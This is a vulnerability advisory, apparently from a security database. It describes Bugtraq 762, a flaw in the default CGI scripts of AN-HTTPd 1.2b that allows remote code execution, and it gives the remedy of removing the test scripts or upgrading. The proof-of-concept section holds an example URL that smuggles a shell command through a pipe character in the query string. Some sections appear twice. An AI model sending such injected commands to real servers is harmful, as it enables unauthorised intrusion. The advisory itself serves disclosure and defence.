AN-HTTPd CGI Vulnerabilities
BID:762
Info
AN-HTTPd CGI Vulnerabilities
| Bugtraq ID: | 762 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Nov 02 1999 12:00AM |
| Updated: | Nov 02 1999 12:00AM |
| Credit: | This vulnerability was posted to Bugtraq by UNYUN <[email protected]>. |
| Vulnerable: |
AN AN-HTTPd 1.2 b |
| Not Vulnerable: |
AN AN-HTTPd 1.2.1 |
Discussion
AN-HTTPd CGI Vulnerabilities
Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data.
Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data.
Exploit / POC
AN-HTTPd CGI Vulnerabilities
(example)
http://www.xxx.yy/cgi-bin/input.bat?|dir..\..\windows
(example)
http://www.xxx.yy/cgi-bin/input.bat?|dir..\..\windows
Solution / Fix
AN-HTTPd CGI Vulnerabilities
Solution:
From the Bugtraq post:
[1] remove the following test CGIs.
cgi-bin/test.bat
cgi-bin/input.bat
cgi-bin/input2.bat
ssi/envout.bat
[2] Ver1.21 has been released at the official site.
http://www.st.rim.or.jp/~nakata/
Solution:
From the Bugtraq post:
[1] remove the following test CGIs.
cgi-bin/test.bat
cgi-bin/input.bat
cgi-bin/input2.bat
ssi/envout.bat
[2] Ver1.21 has been released at the official site.
http://www.st.rim.or.jp/~nakata/
References
AN-HTTPd CGI Vulnerabilities
References:
References: